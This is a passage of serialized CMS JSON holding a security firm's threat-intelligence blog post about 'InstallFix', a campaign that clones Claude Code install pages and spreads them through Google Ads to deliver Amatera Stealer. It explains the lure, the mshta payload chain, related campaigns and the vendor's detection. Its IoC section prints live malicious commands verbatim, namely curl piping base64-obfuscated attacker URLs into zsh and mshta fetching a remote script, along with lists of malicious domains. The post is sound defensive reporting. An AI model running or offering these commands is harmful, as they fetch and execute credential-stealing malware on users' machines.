Type":883},{},[9542],{"type":916},{"data":9544,"content":9545,"nodeType":879},{},[9546,9549,9555],{"data":9547,"marks":9548,"value":7796,"nodeType":883},{},[],{"data":9550,"content":9551,"nodeType":940},{"uri":7799},[9552],{"data":9553,"marks":9554,"value":7804,"nodeType":883},{},[],{"data":9556,"marks":9557,"value":7808,"nodeType":883},{},[],{"data":9559,"content":9560,"nodeType":879},{},[9561],{"data":9562,"marks":9563,"value":7815,"nodeType":883},{},[],{"data":9565,"content":9566,"nodeType":879},{},[9567],{"data":9568,"marks":9569,"value":7822,"nodeType":883},{},[],{"data":9571,"content":9572,"nodeType":879},{},[9573,9576,9582],{"data":9574,"marks":9575,"value":7829,"nodeType":883},{},[],{"data":9577,"content":9578,"nodeType":940},{"uri":7832},[9579],{"data":9580,"marks":9581,"value":7804,"nodeType":883},{},[],{"data":9583,"marks":9584,"value":1350,"nodeType":883},{},[],{"data":9586,"content":9587,"nodeType":905},{},[],{"data":9589,"content":9590,"nodeType":909},{},[9591],{"data":9592,"marks":9593,"value":7850,"nodeType":883},{},[9594],{"type":916},{"data":9596,"content":9597,"nodeType":879},{},[9598],{"data":9599,"marks":9600,"value":7857,"nodeType":883},{},[],{"data":9602,"content":9603,"nodeType":1531},{},[9604,9613,9622],{"data":9605,"content":9606,"nodeType":1535},{},[9607],{"data":9608,"content":9609,"nodeType":879},{},[9610],{"data":9611,"marks":9612,"value":7870,"nodeType":883},{},[],{"data":9614,"content":9615,"nodeType":1535},{},[9616],{"data":9617,"content":9618,"nodeType":879},{},[9619],{"data":9620,"marks":9621,"value":7880,"nodeType":883},{},[],{"data":9623,"content":9624,"nodeType":1535},{},[9625],{"data":9626,"content":9627,"nodeType":879},{},[9628],{"data":9629,"marks":9630,"value":7890,"nodeType":883},{},[],{"data":9632,"content":9633,"nodeType":879},{},[9634],{"data":9635,"marks":9636,"value":7897,"nodeType":883},{},[],{"data":9638,"content":9639,"nodeType":879},{},[9640,9643,9649],{"data":9641,"marks":9642,"value":7904,"nodeType":883},{},[],{"data":9644,"content":9645,"nodeType":940},{"uri":7182},[9646],{"data":9647,"marks":9648,"value":7911,"nodeType":883},{},[],{"data":9650,"marks":9651,"value":1350,"nodeType":883},{},[],{"data":9653,"content":9654,"nodeType":879},{},[9655,9658,9664],{"data":9656,"marks":9657,"value":7921,"nodeType":883},{},[],{"data":9659,"content":9660,"nodeType":940},{"uri":7924},[9661],{"data":9662,"marks":9663,"value":7929,"nodeType":883},{},[],{"data":9665,"marks":9666,"value":7933,"nodeType":883},{},[],{"data":9668,"content":9671,"nodeType":971},{"target":9669},{"sys":9670},{"id":7938,"type":976,"linkType":977},[],{"data":9673,"content":9674,"nodeType":905},{},[],{"data":9676,"content":9677,"nodeType":879},{},[9678],{"data":9679,"marks":9680,"value":7949,"nodeType":883},{},[],{"data":9682,"content":9683,"nodeType":879},{},[9684,9687,9693],{"data":9685,"marks":9686,"value":6671,"nodeType":883},{},[],{"data":9688,"content":9689,"nodeType":940},{"uri":4772},[9690],{"data":9691,"marks":9692,"value":6679,"nodeType":883},{},[],{"data":9694,"marks":9695,"value":6683,"nodeType":883},{},[],{"items":9697},[9698,9700],{"sys":9699,"name":3273},{"id":3272},{"sys":9701,"name":343},{"id":3276},{"items":9703},[9704],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":9705},{"url":872},{"__typename":1967,"sys":9707,"content":9709,"title":10711,"synopsis":10712,"hashTags":59,"publishedDate":10713,"slug":10714,"tagsCollection":10715,"authorsCollection":10721},{"id":9708},"7bG71Eo43crbIHKzczooVS",{"json":9710},{"data":9711,"content":9712,"nodeType":875},{},[9713,9719,9726,9733,9741,9756,9762,9765,9773,9780,9787,9794,9801,9808,9815,9822,9829,9835,9841,9848,9854,9861,9868,9874,9880,9886,9892,9911,9923,9930,9936,9943,9950,9983,9990,9998,10005,10011,10018,10024,10031,10048,10055,10058,10066,10073,10168,10175,10181,10184,10192,10199,10206,10213,10255,10258,10266,10282,10289,10297,10507,10515,10548,10556,10565,10571,10579,10585,10593,10604,10612,10618,10626,10637,10645,10653,10661,10669,10677,10685,10696,10703],{"data":9714,"content":9718,"nodeType":971},{"target":9715},{"sys":9716},{"id":9717,"type":976,"linkType":977},"38JCcRQe2tN9ooHGwreoF5",[],{"data":9720,"content":9721,"nodeType":879},{},[9722],{"data":9723,"marks":9724,"value":9725,"nodeType":883},{},[],"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",{"data":9727,"content":9728,"nodeType":879},{},[9729],{"data":9730,"marks":9731,"value":9732,"nodeType":883},{},[],"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https:\u002F\u002Fsome.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",{"data":9734,"content":9735,"nodeType":879},{},[9736],{"data":9737,"marks":9738,"value":9740,"nodeType":883},{},[9739],{"type":916},"It’s not hard to see how attackers can exploit this. ",{"data":9742,"content":9743,"nodeType":879},{},[9744,9748,9752],{"data":9745,"marks":9746,"value":9747,"nodeType":883},{},[],"We're tracking a technique we're calling ",{"data":9749,"marks":9750,"value":1826,"nodeType":883},{},[9751],{"type":916},{"data":9753,"marks":9754,"value":9755,"nodeType":883},{},[],": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",{"data":9757,"content":9761,"nodeType":971},{"target":9758},{"sys":9759},{"id":9760,"type":976,"linkType":977},"6VMkuQkU5L0vObxIojI1Xw",[],{"data":9763,"content":9764,"nodeType":905},{},[],{"data":9766,"content":9767,"nodeType":909},{},[9768],{"data":9769,"marks":9770,"value":9772,"nodeType":883},{},[9771],{"type":916},"InstallFix Claude Code campaign teardown",{"data":9774,"content":9775,"nodeType":879},{},[9776],{"data":9777,"marks":9778,"value":9779,"nodeType":883},{},[],"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",{"data":9781,"content":9782,"nodeType":879},{},[9783],{"data":9784,"marks":9785,"value":9786,"nodeType":883},{},[],"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",{"data":9788,"content":9789,"nodeType":1036},{},[9790],{"data":9791,"marks":9792,"value":9793,"nodeType":883},{},[],"A new campaign targeting Claude Code",{"data":9795,"content":9796,"nodeType":879},{},[9797],{"data":9798,"marks":9799,"value":9800,"nodeType":883},{},[],"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",{"data":9802,"content":9803,"nodeType":879},{},[9804],{"data":9805,"marks":9806,"value":9807,"nodeType":883},{},[],"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",{"data":9809,"content":9810,"nodeType":879},{},[9811],{"data":9812,"marks":9813,"value":9814,"nodeType":883},{},[],"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",{"data":9816,"content":9817,"nodeType":879},{},[9818],{"data":9819,"marks":9820,"value":9821,"nodeType":883},{},[],"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",{"data":9823,"content":9824,"nodeType":879},{},[9825],{"data":9826,"marks":9827,"value":9828,"nodeType":883},{},[],"You can see a video of a user being served a malicious InstallFix page below.",{"data":9830,"content":9834,"nodeType":971},{"target":9831},{"sys":9832},{"id":9833,"type":976,"linkType":977},"1dhirnghbpAwyCse8cjAas",[],{"data":9836,"content":9840,"nodeType":971},{"target":9837},{"sys":9838},{"id":9839,"type":976,"linkType":977},"5TBnCFM4Y5CoqKPchHDpyv",[],{"data":9842,"content":9843,"nodeType":879},{},[9844],{"data":9845,"marks":9846,"value":9847,"nodeType":883},{},[],"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",{"data":9849,"content":9853,"nodeType":971},{"target":9850},{"sys":9851},{"id":9852,"type":976,"linkType":977},"5g3joJSAP8y8xv2bKaLGe2",[],{"data":9855,"content":9856,"nodeType":1036},{},[9857],{"data":9858,"marks":9859,"value":9860,"nodeType":883},{},[],"Distribution via Google Ads",{"data":9862,"content":9863,"nodeType":879},{},[9864],{"data":9865,"marks":9866,"value":9867,"nodeType":883},{},[],"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",{"data":9869,"content":9873,"nodeType":971},{"target":9870},{"sys":9871},{"id":9872,"type":976,"linkType":977},"3CTtrOy3q8NoMblxkLlTer",[],{"data":9875,"content":9879,"nodeType":971},{"target":9876},{"sys":9877},{"id":9878,"type":976,"linkType":977},"4m5rg9UhRQK0e8OfYFlIUc",[],{"data":9881,"content":9885,"nodeType":971},{"target":9882},{"sys":9883},{"id":9884,"type":976,"linkType":977},"25lAkq9tTZ2Mq52gs6xR8G",[],{"data":9887,"content":9891,"nodeType":971},{"target":9888},{"sys":9889},{"id":9890,"type":976,"linkType":977},"4f4svuW3tjhNc3kEfCwNRG",[],{"data":9893,"content":9894,"nodeType":879},{},[9895,9899,9907],{"data":9896,"marks":9897,"value":9898,"nodeType":883},{},[],"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",{"data":9900,"content":9901,"nodeType":940},{"uri":8965},[9902],{"data":9903,"marks":9904,"value":9906,"nodeType":883},{},[9905],{"type":948},"doubling down on targeting ad manager accounts",{"data":9908,"marks":9909,"value":9910,"nodeType":883},{},[]," to be able to hijack existing ad budgets and spin up even more malicious ads.",{"data":9912,"content":9913,"nodeType":879},{},[9914,9919],{"data":9915,"marks":9916,"value":9918,"nodeType":883},{},[9917],{"type":916},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",{"data":9920,"marks":9921,"value":9922,"nodeType":883},{},[],", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",{"data":9924,"content":9925,"nodeType":879},{},[9926],{"data":9927,"marks":9928,"value":9929,"nodeType":883},{},[],"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",{"data":9931,"content":9935,"nodeType":971},{"target":9932},{"sys":9933},{"id":9934,"type":976,"linkType":977},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"data":9937,"content":9938,"nodeType":1036},{},[9939],{"data":9940,"marks":9941,"value":9942,"nodeType":883},{},[],"The payload",{"data":9944,"content":9945,"nodeType":879},{},[9946],{"data":9947,"marks":9948,"value":9949,"nodeType":883},{},[],"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",{"data":9951,"content":9952,"nodeType":1531},{},[9953,9963,9973],{"data":9954,"content":9955,"nodeType":1535},{},[9956],{"data":9957,"content":9958,"nodeType":879},{},[9959],{"data":9960,"marks":9961,"value":9962,"nodeType":883},{},[],"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https:\u002F\u002Fclaude[.]update-version[.]com\u002Fclaude",{"data":9964,"content":9965,"nodeType":1535},{},[9966],{"data":9967,"content":9968,"nodeType":879},{},[9969],{"data":9970,"marks":9971,"value":9972,"nodeType":883},{},[],"mshta.exe (child process) is invoked to fetch and execute HTML\u002Fscript content from the malicious domain",{"data":9974,"content":9975,"nodeType":1535},{},[9976],{"data":9977,"content":9978,"nodeType":879},{},[9979],{"data":9980,"marks":9981,"value":9982,"nodeType":883},{},[],"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",{"data":9984,"content":9985,"nodeType":879},{},[9986],{"data":9987,"marks":9988,"value":9989,"nodeType":883},{},[],"The MacOS payload also uses additional encoding and staged execution layers.",{"data":9991,"content":9992,"nodeType":879},{},[9993],{"data":9994,"marks":9995,"value":9997,"nodeType":883},{},[9996],{"type":916},"You can see the full list of IoCs at the end of the blog.   ",{"data":9999,"content":10000,"nodeType":879},{},[10001],{"data":10002,"marks":10003,"value":10004,"nodeType":883},{},[],"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",{"data":10006,"content":10010,"nodeType":971},{"target":10007},{"sys":10008},{"id":10009,"type":976,"linkType":977},"TXcSp34sIAOKIXlKT4Lb0",[],{"data":10012,"content":10013,"nodeType":879},{},[10014],{"data":10015,"marks":10016,"value":10017,"nodeType":883},{},[],"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",{"data":10019,"content":10023,"nodeType":971},{"target":10020},{"sys":10021},{"id":10022,"type":976,"linkType":977},"3ExLtcl6df07BcKPsGZn42",[],{"data":10025,"content":10026,"nodeType":1036},{},[10027],{"data":10028,"marks":10029,"value":10030,"nodeType":883},{},[],"Abusing legitimate hosting services",{"data":10032,"content":10033,"nodeType":879},{},[10034,10038,10045],{"data":10035,"marks":10036,"value":10037,"nodeType":883},{},[],"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",{"data":10039,"content":10040,"nodeType":940},{"uri":8582},[10041],{"data":10042,"marks":10043,"value":8587,"nodeType":883},{},[10044],{"type":948},{"data":10046,"marks":10047,"value":3386,"nodeType":883},{},[],{"data":10049,"content":10050,"nodeType":879},{},[10051],{"data":10052,"marks":10053,"value":10054,"nodeType":883},{},[],"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",{"data":10056,"content":10057,"nodeType":905},{},[],{"data":10059,"content":10060,"nodeType":909},{},[10061],{"data":10062,"marks":10063,"value":10065,"nodeType":883},{},[10064],{"type":916},"A broader trend",{"data":10067,"content":10068,"nodeType":879},{},[10069],{"data":10070,"marks":10071,"value":10072,"nodeType":883},{},[],"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",{"data":10074,"content":10075,"nodeType":1531},{},[10076,10099,10122,10145],{"data":10077,"content":10078,"nodeType":1535},{},[10079],{"data":10080,"content":10081,"nodeType":879},{},[10082,10085,10095],{"data":10083,"marks":10084,"value":21,"nodeType":883},{},[],{"data":10086,"content":10088,"nodeType":940},{"uri":10087},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fclaude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack\u002F",[10089],{"data":10090,"marks":10091,"value":10094,"nodeType":883},{},[10092,10093],{"type":948},{"type":916},"Fake Claude artifacts used in traditional ClickFix lures",{"data":10096,"marks":10097,"value":10098,"nodeType":883},{},[],": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",{"data":10100,"content":10101,"nodeType":1535},{},[10102],{"data":10103,"content":10104,"nodeType":879},{},[10105,10108,10118],{"data":10106,"marks":10107,"value":21,"nodeType":883},{},[],{"data":10109,"content":10111,"nodeType":940},{"uri":10110},"https:\u002F\u002Fhunt.io\u002Fblog\u002Ffake-homebrew-clickfix-cuckoo-stealer-macos",[10112],{"data":10113,"marks":10114,"value":10117,"nodeType":883},{},[10115,10116],{"type":948},{"type":916},"Fake Homebrew installation pages",{"data":10119,"marks":10120,"value":10121,"nodeType":883},{},[],": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",{"data":10123,"content":10124,"nodeType":1535},{},[10125],{"data":10126,"content":10127,"nodeType":879},{},[10128,10131,10141],{"data":10129,"marks":10130,"value":21,"nodeType":883},{},[],{"data":10132,"content":10134,"nodeType":940},{"uri":10133},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fopenclaw-github-ghostsocks-infostealer",[10135],{"data":10136,"marks":10137,"value":10140,"nodeType":883},{},[10138,10139],{"type":948},{"type":916},"Fake OpenClaw installers on GitHub",{"data":10142,"marks":10143,"value":10144,"nodeType":883},{},[],": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",{"data":10146,"content":10147,"nodeType":1535},{},[10148],{"data":10149,"content":10150,"nodeType":879},{},[10151,10154,10164],{"data":10152,"marks":10153,"value":21,"nodeType":883},{},[],{"data":10155,"content":10157,"nodeType":940},{"uri":10156},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F02\u002Fmalicious-npm-packages-harvest-crypto.html",[10158],{"data":10159,"marks":10160,"value":10163,"nodeType":883},{},[10161,10162],{"type":948},{"type":916},"Trojanised npm packages",{"data":10165,"marks":10166,"value":10167,"nodeType":883},{},[],": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",{"data":10169,"content":10170,"nodeType":879},{},[10171],{"data":10172,"marks":10173,"value":10174,"nodeType":883},{},[],"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",{"data":10176,"content":10180,"nodeType":971},{"target":10177},{"sys":10178},{"id":10179,"type":976,"linkType":977},"6fbQRdi1xXzMOmYTcAGDLc",[],{"data":10182,"content":10183,"nodeType":905},{},[],{"data":10185,"content":10186,"nodeType":1036},{},[10187],{"data":10188,"marks":10189,"value":10191,"nodeType":883},{},[10190],{"type":916},"How Push detects InstallFix",{"data":10193,"content":10194,"nodeType":879},{},[10195],{"data":10196,"marks":10197,"value":10198,"nodeType":883},{},[],"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",{"data":10200,"content":10201,"nodeType":879},{},[10202],{"data":10203,"marks":10204,"value":10205,"nodeType":883},{},[],"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",{"data":10207,"content":10208,"nodeType":879},{},[10209],{"data":10210,"marks":10211,"value":10212,"nodeType":883},{},[],"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",{"data":10214,"content":10215,"nodeType":879},{},[10216,10220,10229,10232,10241,10245,10252],{"data":10217,"marks":10218,"value":10219,"nodeType":883},{},[],"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",{"data":10221,"content":10223,"nodeType":940},{"uri":10222},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fproduct-brochure",[10224],{"data":10225,"marks":10226,"value":10228,"nodeType":883},{},[10227],{"type":948},"check out our latest product overview",{"data":10230,"marks":10231,"value":2524,"nodeType":883},{},[],{"data":10233,"content":10235,"nodeType":940},{"uri":10234},"https:\u002F\u002Fpushsecurity.com\u002Fproduct-demo\u002F",[10236],{"data":10237,"marks":10238,"value":10240,"nodeType":883},{},[10239],{"type":948},"visit our demo library",{"data":10242,"marks":10243,"value":10244,"nodeType":883},{},[],", or ",{"data":10246,"content":10247,"nodeType":940},{"uri":4772},[10248],{"data":10249,"marks":10250,"value":1751,"nodeType":883},{},[10251],{"type":948},{"data":10253,"marks":10254,"value":1350,"nodeType":883},{},[],{"data":10256,"content":10257,"nodeType":905},{},[],{"data":10259,"content":10260,"nodeType":909},{},[10261],{"data":10262,"marks":10263,"value":10265,"nodeType":883},{},[10264],{"type":916},"IoCs",{"data":10267,"content":10268,"nodeType":879},{},[10269,10272,10279],{"data":10270,"marks":10271,"value":8703,"nodeType":883},{},[],{"data":10273,"content":10274,"nodeType":940},{"uri":8706},[10275],{"data":10276,"marks":10277,"value":8711,"nodeType":883},{},[10278],{"type":948},{"data":10280,"marks":10281,"value":8715,"nodeType":883},{},[],{"data":10283,"content":10284,"nodeType":879},{},[10285],{"data":10286,"marks":10287,"value":10288,"nodeType":883},{},[],"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",{"data":10290,"content":10291,"nodeType":879},{},[10292],{"data":10293,"marks":10294,"value":10296,"nodeType":883},{},[10295],{"type":916},"Cloned domains:",{"data":10298,"content":10299,"nodeType":1531},{},[10300,10310,10320,10330,10340,10350,10359,10369,10379,10388,10398,10408,10418,10428,10438,10448,10458,10467,10477,10487,10497],{"data":10301,"content":10302,"nodeType":1535},{},[10303],{"data":10304,"content":10305,"nodeType":879},{},[10306],{"data":10307,"marks":10308,"value":10309,"nodeType":883},{},[],"claud-code[.]pages[.]dev",{"data":10311,"content":10312,"nodeType":1535},{},[10313],{"data":10314,"content":10315,"nodeType":879},{},[10316],{"data":10317,"marks":10318,"value":10319,"nodeType":883},{},[],"claulastver[.]squarespace[.]com",{"data":10321,"content":10322,"nodeType":1535},{},[10323],{"data":10324,"content":10325,"nodeType":879},{},[10326],{"data":10327,"marks":10328,"value":10329,"nodeType":883},{},[],"claudecode-developers[.]squarespace[.]com",{"data":10331,"content":10332,"nodeType":1535},{},[10333],{"data":10334,"content":10335,"nodeType":879},{},[10336],{"data":10337,"marks":10338,"value":10339,"nodeType":883},{},[],"hgjbulk.pages[.]dev",{"data":10341,"content":10342,"nodeType":1535},{},[10343],{"data":10344,"content":10345,"nodeType":879},{},[10346],{"data":10347,"marks":10348,"value":10349,"nodeType":883},{},[],"jhgyuifyfiguohi[.]pages[.]dev",{"data":10351,"content":10352,"nodeType":1535},{},[10353],{"data":10354,"content":10355,"nodeType":879},{},[10356],{"data":10357,"marks":10358,"value":10339,"nodeType":883},{},[],{"data":10360,"content":10361,"nodeType":1535},{},[10362],{"data":10363,"content":10364,"nodeType":879},{},[10365],{"data":10366,"marks":10367,"value":10368,"nodeType":883},{},[],"claude-code-install[.]squarespace[.]com",{"data":10370,"content":10371,"nodeType":1535},{},[10372],{"data":10373,"content":10374,"nodeType":879},{},[10375],{"data":10376,"marks":10377,"value":10378,"nodeType":883},{},[],"claude-code-docs-site[.]pages[.]dev",{"data":10380,"content":10381,"nodeType":1535},{},[10382],{"data":10383,"content":10384,"nodeType":879},{},[10385],{"data":10386,"marks":10387,"value":10319,"nodeType":883},{},[],{"data":10389,"content":10390,"nodeType":1535},{},[10391],{"data":10392,"content":10393,"nodeType":879},{},[10394],{"data":10395,"marks":10396,"value":10397,"nodeType":883},{},[],"cladueall[.]pages[.]dev",{"data":10399,"content":10400,"nodeType":1535},{},[10401],{"data":10402,"content":10403,"nodeType":879},{},[10404],{"data":10405,"marks":10406,"value":10407,"nodeType":883},{},[],"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",{"data":10409,"content":10410,"nodeType":1535},{},[10411],{"data":10412,"content":10413,"nodeType":879},{},[10414],{"data":10415,"marks":10416,"value":10417,"nodeType":883},{},[],"myclauda[.]it[.]com",{"data":10419,"content":10420,"nodeType":1535},{},[10421],{"data":10422,"content":10423,"nodeType":879},{},[10424],{"data":10425,"marks":10426,"value":10427,"nodeType":883},{},[],"vdsafsaf[.]it[.]com",{"data":10429,"content":10430,"nodeType":1535},{},[10431],{"data":10432,"content":10433,"nodeType":879},{},[10434],{"data":10435,"marks":10436,"value":10437,"nodeType":883},{},[],"asdasdasdadsvvvvv[.]pages[.]dev\u002F",{"data":10439,"content":10440,"nodeType":1535},{},[10441],{"data":10442,"content":10443,"nodeType":879},{},[10444],{"data":10445,"marks":10446,"value":10447,"nodeType":883},{},[],"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",{"data":10449,"content":10450,"nodeType":1535},{},[10451],{"data":10452,"content":10453,"nodeType":879},{},[10454],{"data":10455,"marks":10456,"value":10457,"nodeType":883},{},[],"claude-code-macos[.]com",{"data":10459,"content":10460,"nodeType":1535},{},[10461],{"data":10462,"content":10463,"nodeType":879},{},[10464],{"data":10465,"marks":10466,"value":10378,"nodeType":883},{},[],{"data":10468,"content":10469,"nodeType":1535},{},[10470],{"data":10471,"content":10472,"nodeType":879},{},[10473],{"data":10474,"marks":10475,"value":10476,"nodeType":883},{},[],"claude-code-update[.]squarespace[.]com",{"data":10478,"content":10479,"nodeType":1535},{},[10480],{"data":10481,"content":10482,"nodeType":879},{},[10483],{"data":10484,"marks":10485,"value":10486,"nodeType":883},{},[],"claudecodeupdate[.]squarespace[.]com",{"data":10488,"content":10489,"nodeType":1535},{},[10490],{"data":10491,"content":10492,"nodeType":879},{},[10493],{"data":10494,"marks":10495,"value":10496,"nodeType":883},{},[],"notebooklm-version-upd[.]squarespace[.]com",{"data":10498,"content":10499,"nodeType":1535},{},[10500],{"data":10501,"content":10502,"nodeType":879},{},[10503],{"data":10504,"marks":10505,"value":10506,"nodeType":883},{},[],"notklmalans[.]pages[.]dev",{"data":10508,"content":10509,"nodeType":879},{},[10510],{"data":10511,"marks":10512,"value":10514,"nodeType":883},{},[10513],{"type":916},"Domains hosting malicious payload:",{"data":10516,"content":10517,"nodeType":1531},{},[10518,10528,10538],{"data":10519,"content":10520,"nodeType":1535},{},[10521],{"data":10522,"content":10523,"nodeType":879},{},[10524],{"data":10525,"marks":10526,"value":10527,"nodeType":883},{},[],"contatoplus[.]com",{"data":10529,"content":10530,"nodeType":1535},{},[10531],{"data":10532,"content":10533,"nodeType":879},{},[10534],{"data":10535,"marks":10536,"value":10537,"nodeType":883},{},[],"sarahmoftah[.]com",{"data":10539,"content":10540,"nodeType":1535},{},[10541],{"data":10542,"content":10543,"nodeType":879},{},[10544],{"data":10545,"marks":10546,"value":10547,"nodeType":883},{},[],"claude[.]update-version[.]com",{"data":10549,"content":10550,"nodeType":879},{},[10551],{"data":10552,"marks":10553,"value":10555,"nodeType":883},{},[10554],{"type":916},"Commands:",{"data":10557,"content":10558,"nodeType":879},{},[10559],{"data":10560,"marks":10561,"value":10564,"nodeType":883},{},[10562],{"type":10563},"code","curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",{"data":10566,"content":10567,"nodeType":879},{},[10568],{"data":10569,"marks":10570,"value":21,"nodeType":883},{},[],{"data":10572,"content":10573,"nodeType":879},{},[10574],{"data":10575,"marks":10576,"value":10578,"nodeType":883},{},[10577],{"type":10563},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",{"data":10580,"content":10581,"nodeType":879},{},[10582],{"data":10583,"marks":10584,"value":5957,"nodeType":883},{},[],{"data":10586,"content":10587,"nodeType":879},{},[10588],{"data":10589,"marks":10590,"value":10592,"nodeType":883},{},[10591],{"type":10563},"C:\\Windows\\SysWOW64\\mshta.exe https:\u002F\u002Fclaude.update-version.com\u002Fclaude ",{"data":10594,"content":10595,"nodeType":879},{},[10596,10599],{"data":10597,"marks":10598,"value":5957,"nodeType":883},{},[],{"data":10600,"marks":10601,"value":10603,"nodeType":883},{},[10602],{"type":916},"Base64 decoded url:",{"data":10605,"content":10606,"nodeType":879},{},[10607],{"data":10608,"marks":10609,"value":10611,"nodeType":883},{},[10610],{"type":10563},"contatoplus[.]com\u002Fcurl\u002F8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",{"data":10613,"content":10614,"nodeType":879},{},[10615],{"data":10616,"marks":10617,"value":21,"nodeType":883},{},[],{"data":10619,"content":10620,"nodeType":879},{},[10621],{"data":10622,"marks":10623,"value":10625,"nodeType":883},{},[10624],{"type":10563},"saramoftah[.]com\u002Fcurl\u002F958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",{"data":10627,"content":10628,"nodeType":879},{},[10629,10632],{"data":10630,"marks":10631,"value":5957,"nodeType":883},{},[],{"data":10633,"marks":10634,"value":10636,"nodeType":883},{},[10635],{"type":916},"Second 